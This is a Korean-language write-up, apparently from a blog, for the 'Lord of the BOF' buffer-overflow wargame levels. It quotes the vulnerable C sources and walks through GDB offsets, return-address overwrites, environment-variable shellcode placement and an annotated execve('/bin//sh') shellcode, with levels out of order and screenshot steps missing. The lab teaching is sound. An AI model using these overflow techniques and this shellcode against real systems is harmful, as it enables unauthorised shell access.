┗System∑Sec†ion┛

[goblin@localhost goblin]$ cat orc.c

/*

The Lord of the BOF : The Fellowship of the BOF

- orc

- egghunter

*/

#include <stdio.h>

#include <stdlib.h>

extern char **environ;

main(int argc, char *argv[])

{

char buffer[40];

int i;

if(argc < 2){

printf("argv error\n");

exit(0);

}

// egghunter

for(i=0; environ[i]; i++)

memset(environ[i], 0, strlen(environ[i]));

if(argv[1][47] != '\xbf')

{

printf("stack is still your friend.\n");

exit(0);

}

strcpy(buffer, argv[1]);

printf("%s\n", buffer);

}

+ egghunter라는 주석에서 알 수 있듯이 환경변수(environment)를 전부 0으로 초기화 합니다.

즉, (LEVEL2 && LEVEL3)처럼 환경변수를 이용 할 수 없습니다.

+ if문을 통해 argv[1][47]가 "\xbf" 가 아니면 종료한다.

그러나 [buffer(40] + [EBP(4)] + [RET(4)] 이므로 결국 RET주소에 마지막에 "\x??\x??\x??\xbf"로 끝나면 되겠네요.

+ 어차피 [LEVEL1]과 틀린 점은 버퍼가 줄었다는 것 밖에 없습니다.

해당 셸코드는 24Byte이고 44Byte의 여유 공간(buffer[40Byte] + EBP[4Byte])이 있으므로 LEVEL1과 같이

BUFFER에 셸코드(ShellCode)를 삽입하여 문제를 풀수 있겠네요.

① 먼저 권한이 없으므로 해당 사본을 만듭니다.

# cp orc cro

② 디버깅을 위해 argv[1][47]이 "\xbf"가 통과 되도록 테스트 문을 만듭니다.

(공격문과 테스트문의 길이가 같아야 같은 주소를 얻을 수 있습니다)

③ 그럼 이제 GDB로 해당 RET을 덮을 buffer의 주소를 찾도록 합니다.

① 테스트 문을 공격 문으로 바꾸자!

② 이제 바뀐 공격 문으로 확인해 보자!.

* 검색결과를 인용하자면 GDB로 디버깅 하면 어딘가에 한번 복사되어 분석이 들어가기 때문에

동적으로 움직이고 있는 실제 프로세스의 주소와 GDB로 디버깅 했을 때엔 차이가 난다고 합니다.

① orc.c의 사본을 만들어 간단한 테스트를 해봅시다.

② 해당 printf("[ %#x ]\n", buffer); 라인을 추가 후 컴파일 하고 다시 공격 문으로 확인해 봅시다.

③ 확인한(0xbffffae0) 리턴 주소만 다시 바꿔 확인해 보죠..

④ 결과.

[gremlin@localhost gremlin]$ cat cobolt.c

/*

The Lord of the BOF : The Fellowship of the BOF

- goblin

- small buffer + stdin

*/

int main()

{

char buffer[16];

gets(buffer);

printf("%s\n", buffer);

}

+ [LEVEL2]와 틀려진건 argv인자 배열이 없어지고 gets()로 인해 표준입력 받아 buffer에 저장.

① 그럼 일단 올려보고 확인해 봅시다.

+ env 명령으로 해당 환경변수를 확인할수 있습니다.

[gremlin@localhost gremlin]$ ./getenv SHCODE

0xbfffff06

[gremlin@localhost gremlin]$ cat cobolt.c

/*

The Lord of the BOF : The Fellowship of the BOF

- cobolt

- small buffer

*/

int main(int argc, char *argv[])

{

char buffer[16];

if(argc < 2){

printf("argv error\n");

exit(0);

}

strcpy(buffer, argv[1]);

printf("%s\n", buffer);

}

+ [LEVEL1]과 틀려진 거라곤 버퍼 크기가 작아진 것 밖에 없습니다.

+ 따라서 환경변수에 셸코드를 올려놓고, RET주소를 해당 환경변수로 합니다.

①셸코드를 환경변수로 올리기 전에 우리가 사용되는 메모리 공간을 봅시다.

[해당 원문 참조]

② 우리가 셸코드를 올리게 되는 곳이 저 스택영역 안에 환경변수가 사용되는 메모리 공간입니다.

② 그럼 일단 올려보고 확인해 봅시다.

+ env 명령으로 해당 환경변수를 확인할수 있습니다.

[gate@localhost gate]$ cat gremlin.c
/*

The Lord of the BOF : The Fellowship of the BOF

- gremlin

- simple BOF

*/

int main(int argc, char *argv[])

{

char buffer[256];

if(argc < 2){

printf("argv error\n");

exit(0);

}

strcpy(buffer, argv[1]);

printf("%s\n", buffer);

}

+ simple BOF라는 주석에서 알 수 있듯이 버퍼가 256Byte로 넉넉하다.

+ argv 인자로 문자열을 받아 strcpy()로 buffer에 복사를 한다.

+ strcpy()는 복사할 목적지 문자열에 크기를 제한하지 않음으로 Overflow가 가능하다.

[gate@localhost tmp]$ gdb -q gremlin

(gdb) disassemble main

Dump of assembler code for function main:

...[중략]...

0x8048466 <main+54>: call 0x8048370 <strcpy>

0x804846b <main+59>: add $0x8,%esp

0x804846e <main+62>: lea 0xffffff00(%ebp),%eax

0x8048474 <main+68>: push %eax

0x8048475 <main+69>: push $0x80484ec

...[중략]...

(gdb) b *main+62

Breakpoint 1 at 0x804846e

(gdb) r $(python -c 'print "D"*264')

Starting program: /home/gate/tmp/gremlin $(python -c 'print "D"*264')

Breakpoint 1, 0x804846e in main ()

① argv 인자로 전달한 공격문은 strcpy()함수 이후에 buffer에 복사되기 때문에 strcpy()이후로 break를 겁니다.

② 공격문을 argv 인자전달로 넘겨주기 때문에 공격문의 길이에 따라 EBP 값이 변합니다.

따라서 Buffer(256) + EBP(4) + RET(4) = 264Byte이므로 Python 인터프리터문으로 "D"*264 전달합니다.

③ EBP값은 0xbffffa18 이므로 EBP-256(buffer길이) 빼주면 0xbffff918이 됩니다.

여기서 "D"의 ASCII코드값이 44이므로 쉽게 눈으로 확인 할 수 있습니다.

④ 대략적으로 중간 지점인 0xbffff0a8을 리턴할 주소로 잡습니다.

.global main

main:

/* int execve(const char *filename, char *const argv[], char *const envp[]) */

xor %eax, %eax         ;# eax를 0으로

push %eax ;# 문자열 종결을 위해 널을 푸시

push $0x68732f2f ;# "//sh"를 스택에 푸시

push $0x6e69622f ;# "/bin"를 스택에 푸시

mov %esp, %ebx         ;# esp에서 "/bin//sh"의 주소를 가져와 ebx에 쓴다.

push %eax ;# 32비트 널 종결자를 스택에 푸시

push %ebx ;# 널 종결자 위에 문자열 주소를 푸시

mov %esp, %ecx         ;# 문자열 포인터가 있는 인자 배열

cdq ;# eax에서 부호 비트를 가져와 edx를 0으로

mov $0xb, %al ;# 시스템 콜 11번 (execve)

int $0x80